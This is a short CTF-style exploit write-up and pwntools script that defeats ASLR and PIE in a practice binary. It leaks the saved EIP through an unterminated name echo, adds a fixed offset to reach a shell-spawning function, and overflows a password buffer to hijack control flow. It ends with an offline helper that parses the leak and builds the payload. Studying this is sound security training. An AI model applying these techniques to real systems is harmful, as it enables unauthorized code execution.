ASLR combo with PIE

Bypassing a PIE-enabled binary !!


OK, this was my first encounter with a PIE-enabled binary, so the exploit goes like this...

1. Leak the stack contents, eventually leaking the saved EIP (the name buffer is echoed back without a terminator, so the bytes right after it come out too).
2. Calculate the offset between the leaked EIP and the required address; here it was func(), which spawns a shell.
3. Now overflow pass_buffer with the leaked EIP + offset.

Offsets used:

a) name_offset = address of the saved EIP slot - address of name_buffer; pass_offset is found the same way from pass_buffer.
b) bin_offset = the distance between the saved EIP's value (not its address) and the give_shell address. PIE only shifts the whole image, so this distance is constant across runs.


```python
from pwn import *

context.bits = 32

name_offset = 112      # name_buffer -> saved EIP slot
pass_offset = 212      # pass_buffer -> saved EIP slot
# saved-eip = 0xf7e1272e
bin_offset = 2015403   # leaked saved-EIP value -> give_shell
# earlier guesses: 2710294403, 1584672893, 2002347

p = process('./aslr')  # binary sits in the current directory

msg = p.recvuntil(b'?\n')
print(msg)
print("[+] sending name length")
p.sendline(b"116")
print(116)

msg = p.recvuntil(b'?\n')
print(b"[" + msg + b"]")
print("[+] sending name")
payload = b"A" * name_offset
p.sendline(payload)

print(p.recvuntil(b"Hello, "))
print(p.recvn(112))              # our 112 name bytes echoed back (recvn waits for all of them)
a = p.recvline().rstrip(b"\n")   # what follows the buffer on the same line: the saved EIP
print(b"[" + a + b"]")

context.bits = len(a) * 8        # 4 leaked bytes -> 32-bit unpack
a = unpack(a)
print("[+] Leaked address")
print(hex(a))

a += bin_offset
print("[+] Target address")
print(hex(a))

print("[+] Sending final payload")
payloads = b"A" * pass_offset + pack(a)
p.sendline(payloads)
p.interactive()
```
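An added, offline helper (not part of the original write-up) that parses the greeting line with the offsets above and refuses a truncated leak: because the program prints the buffer with a string routine, a NUL inside the saved EIP cuts the leak short, and the script's `context.bits = len(a) * 8` line would then silently unpack it as a 16- or 24-bit value. The sample output is constructed here.

```python
import struct

# Offsets from the write-up above.
NAME_OFFSET = 112      # name_buffer -> saved EIP slot
PASS_OFFSET = 212      # pass_buffer -> saved EIP slot
BIN_OFFSET = 2015403   # leaked saved-EIP value -> give_shell


def parse_leak(output, name_offset=NAME_OFFSET, word_size=4):
    """Return the leaked saved-EIP value from the program's output, or None.

    `output` holds everything printed after the name was sent: b"Hello, ",
    the echoed name bytes, then whatever follows in memory up to the first
    NUL (or newline), then b"\\n". Anything other than exactly `word_size`
    leaked bytes means the leak was cut short, so we refuse to guess.
    """
    marker = b"Hello, "
    start = output.find(marker)
    if start < 0:
        return None
    line = output[start + len(marker):].split(b"\n", 1)[0]
    leaked = line[name_offset:]
    if len(leaked) != word_size:
        return None
    return struct.unpack("<I", leaked)[0]  # 32-bit little-endian, as on the page


def build_payload(leaked_eip, pass_offset=PASS_OFFSET, bin_offset=BIN_OFFSET):
    """Overflow pass_buffer up to the saved EIP and overwrite it with give_shell."""
    target = (leaked_eip + bin_offset) & 0xFFFFFFFF  # keep it a 32-bit value
    return b"A" * pass_offset + struct.pack("<I", target), target


# Constructed sample: the greeting echoes 112 name bytes followed by the
# saved EIP 0xf7e1272e (the value noted in the script) in little-endian order.
SAMPLE_OUTPUT = (b"What is your name?\nHello, " + b"A" * NAME_OFFSET
                 + struct.pack("<I", 0xf7e1272e) + b"\n")

# Constructed sample of a truncated leak: only two bytes came back.
TRUNCATED_OUTPUT = b"Hello, " + b"A" * NAME_OFFSET + b"\x2e\x27" + b"\n"
```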